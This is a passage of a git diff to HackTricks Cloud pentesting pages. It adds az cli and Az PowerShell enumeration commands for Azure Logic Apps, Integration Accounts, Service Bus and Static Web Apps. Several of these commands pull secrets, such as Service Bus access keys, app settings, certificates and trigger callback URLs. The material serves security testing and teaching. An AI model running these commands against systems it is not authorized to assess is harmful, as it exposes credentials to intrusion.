+az logicapp config appsettings list --name --resource-group
+```
+{% endcode %}
+{% endtab %}
-{{#tab name="Az PowerSHell" }}
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
```bash
+Get-Command -Module Az.LogicApp
+
# List
Get-AzLogicApp -ResourceGroupName
# Get info
Get-AzLogicApp -ResourceGroupName -Name
-# Get Logic App config
-(Get-AzLogicApp -ResourceGroupName -Name ).Definition | ConvertTo-Json
-# Get service ppal used
-(Get-AzLogicApp -ResourceGroupName -Name ).Identity
+
+# Get details of a specific Logic App workflow run action
+Get-AzLogicAppRunAction -ResourceGroupName "" -Name "" -RunName ""
+
+# Get the run history for a specific Logic App
+Get-AzLogicAppRunHistory -ResourceGroupName "" -Name ""
+
+# Get details about triggers for a specific Logic App
+Get-AzLogicAppTrigger -ResourceGroupName "" -Name ""
+
+# Get the callback URL for a specific trigger in a Logic App
+Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "" -LName "" -TriggerName ""
+
+# Get the history of a specific trigger in a Logic App
+Get-AzLogicAppTriggerHistory -ResourceGroupName "" -Name "" -TriggerName ""
+
```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
-{{#endtab }}
-{{#endtabs }}
-{{#include ../../../banners/hacktricks-training.md}}
+### Integration Accounts
+**Integration Accounts**, are a feature of Azure Logic Apps. Integration Accounts are used to facilitate enterprise-level integrations by enabling advanced B2B capabilities, such as EDI, AS2, and XML schema management. Integration Accounts are a container in Azure that store the following artifacts used for Logic Apps:
+
+* Schemas: Manage XML schemas for validating and processing messages in your integration account.
+* Maps: Configure XSLT-based transformations to convert data formats within your integration workflows.
+* Assemblies: Manage integration account assemblies to streamline logic and data processing.
+* Certificates: Handle certificates for encrypting and signing messages, ensuring secure communication.
+* Partners: Manage trading partner information for B2B transactions, enabling seamless integrations.
+* Agreements: Configure rules and settings for exchanging data with trading partners (e.g., EDI, AS2).
+* Batch Configurations: Manage batch processing configurations to group and process messages efficiently.
+* RosettaNet PIP: Configure RosettaNet Partner Interface Processes (PIPs) for standardizing B2B communication.
+
+#### Enumeration
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
+```bash
+# Integration account
+az logic integration-account list --resource-group
+az logic integration-account show --resource-group --name
+az logic integration-account list-callback-url --resource-group --integration-account-name
+
+# Batch-configuration
+az logic integration-account batch-configuration list \
+ --resource-group \
+ --integration-account-name
+
+az logic integration-account batch-configuration show \
+ --resource-group \
+ --integration-account-name \
+ --batch-configuration-name
+
+# Map
+az logic integration-account map list \
+ --resource-group \
+ --integration-account
+
+az logic integration-account map show \
+ --resource-group \
+ --integration-account \
+ --map-name
+
+# Partner
+az logic integration-account partner list \
+ --resource-group \
+ --integration-account
+
+az logic integration-account partner show \
+ --resource-group \
+ --integration-account \
+ --name
+
+# Session
+az logic integration-account session list \
+ --resource-group \
+ --integration-account
+
+az logic integration-account session show \
+ --resource-group \
+ --integration-account \
+ --name
+
+# Assembly
+# Session
+az logic integration-account assembly list \
+ --resource-group \
+ --integration-account
+
+az logic integration-account assembly show \
+ --resource-group \
+ --integration-account \
+ --assembly-artifact-name
+
+
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.LogicApp
+
+# Retrieve details of an integration account
+Get-AzIntegrationAccount -ResourceGroupName -Name
+
+# Retrieve the callback URL of an integration account
+Get-AzIntegrationAccountCallbackUrl -ResourceGroupName -IntegrationAccountName
+
+# Retrieve details of a specific agreement in an integration account
+Get-AzIntegrationAccountAgreement -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific assembly in an integration account
+Get-AzIntegrationAccountAssembly -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific batch configuration in an integration account
+Get-AzIntegrationAccountBatchConfiguration -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific certificate in an integration account
+Get-AzIntegrationAccountCertificate -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific map in an integration account
+Get-AzIntegrationAccountMap -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific partner in an integration account
+Get-AzIntegrationAccountPartner -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific schema in an integration account
+Get-AzIntegrationAccountSchema -ResourceGroupName -IntegrationAccountName -Name
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+
+## Privilege Escalation
+
+Same as logic apps privesc:
+
+{% content-ref url="../az-privilege-escalation/az-logic-apps-privesc.md" %}
+[az-logic-apps-privesc.md](../az-privilege-escalation/az-logic-apps-privesc.md)
+{% endcontent-ref %}
+
+## Post Exploitation
+
+{% content-ref url="../az-post-exploitation/az-logic-apps-post-exploitation.md" %}
+[az-logic-apps-post-exploitation.md](../az-post-exploitation/az-logic-apps-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+Support HackTricks
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
index 6e74cc9144..1626ccb39f 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
@@ -51,6 +51,9 @@ sku, authrorization rule,
### Enumeration
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# Queue Enumeration
az servicebus queue list --resource-group --namespace-name
@@ -78,6 +81,57 @@ az servicebus queue authorization-rule list --resource-group -
az servicebus topic authorization-rule list --resource-group --namespace-name --topic-name
az servicebus namespace authorization-rule keys list --resource-group --namespace-name --name
```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.ServiceBus
+
+# Retrieves details of a Service Bus namespace, including V2-specific features like additional metrics or configurations.
+Get-AzServiceBusNamespaceV2 -ResourceGroupName -Name
+
+# Retrieves the authorization rules for a Service Bus namespace, queue, or topic.
+Get-AzServiceBusAuthorizationRule -ResourceGroupName -NamespaceName
+
+# Retrieves the Geo-Disaster Recovery configuration for a Service Bus namespace, if it is enabled.
+Get-AzServiceBusGeoDRConfiguration -ResourceGroupName -NamespaceName
+
+# Retrieves the shared access keys for a specified authorization rule in a Service Bus namespace.
+Get-AzServiceBusKey -ResourceGroupName -NamespaceName -Name
+
+# Retrieves the migration state and details for a Service Bus namespace, if a migration is in progress.
+Get-AzServiceBusMigration -ResourceGroupName -NamespaceName
+
+# Retrieves properties and details about a Service Bus namespace.
+Get-AzServiceBusNamespace -ResourceGroupName -Name
+
+# Retrieves the network rule set for a Service Bus namespace, such as IP restrictions or virtual network access rules.
+Get-AzServiceBusNetworkRuleSet -ResourceGroupName -NamespaceName
+
+# Retrieves private endpoint connections for a Service Bus namespace.
+Get-AzServiceBusPrivateEndpointConnection -ResourceGroupName -NamespaceName
+
+# Retrieves private link resources associated with a Service Bus namespace.
+Get-AzServiceBusPrivateLink -ResourceGroupName -NamespaceName
+
+# Retrieves details of a specified queue in a Service Bus namespace.
+Get-AzServiceBusQueue -ResourceGroupName -NamespaceName -Name
+
+# Retrieves rules (filters and actions) for a subscription under a Service Bus topic.
+Get-AzServiceBusRule -ResourceGroupName -NamespaceName -TopicName -SubscriptionName
+
+# Retrieves details of subscriptions for a specified Service Bus topic.
+Get-AzServiceBusSubscription -ResourceGroupName -NamespaceName -TopicName
+
+# Retrieves details of a specified topic in a Service Bus namespace.
+Get-AzServiceBusTopic -ResourceGroupName -NamespaceName
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
### Privilege Escalation
diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
index 1576b65e97..60b6d6e324 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md
@@ -84,6 +84,9 @@ For more info you can find an Azure guide use a vault secret in a static app in
## Enumeration
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# List Static Webapps
az staticwebapp list --output table
@@ -115,6 +118,58 @@ az rest --method POST \
# Check connected backends
az staticwebapp backends show --name --resource-group
```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.Websites
+
+# Retrieves details of a specific Static Web App in the specified resource group.
+Get-AzStaticWebApp -ResourceGroupName -Name
+
+# Retrieves the build details for a specific Static Web App.
+Get-AzStaticWebAppBuild -ResourceGroupName -Name
+
+# Retrieves the application settings for a specific build environment in a Static Web App.
+Get-AzStaticWebAppBuildAppSetting -ResourceGroupName -Name -EnvironmentName
+
+# Retrieves functions for a specific build environment in a Static Web App.
+Get-AzStaticWebAppBuildFunction -ResourceGroupName -Name -EnvironmentName
+
+# Retrieves function app settings for a specific build environment in a Static Web App.
+Get-AzStaticWebAppBuildFunctionAppSetting -ResourceGroupName -Name -EnvironmentName
+
+# Retrieves the configured roles for a Static Web App.
+Get-AzStaticWebAppConfiguredRole -ResourceGroupName -Name
+
+# Retrieves the custom domains configured for a Static Web App.
+Get-AzStaticWebAppCustomDomain -ResourceGroupName -Name
+
+# Retrieves details of the functions associated with a Static Web App.
+Get-AzStaticWebAppFunction -ResourceGroupName -Name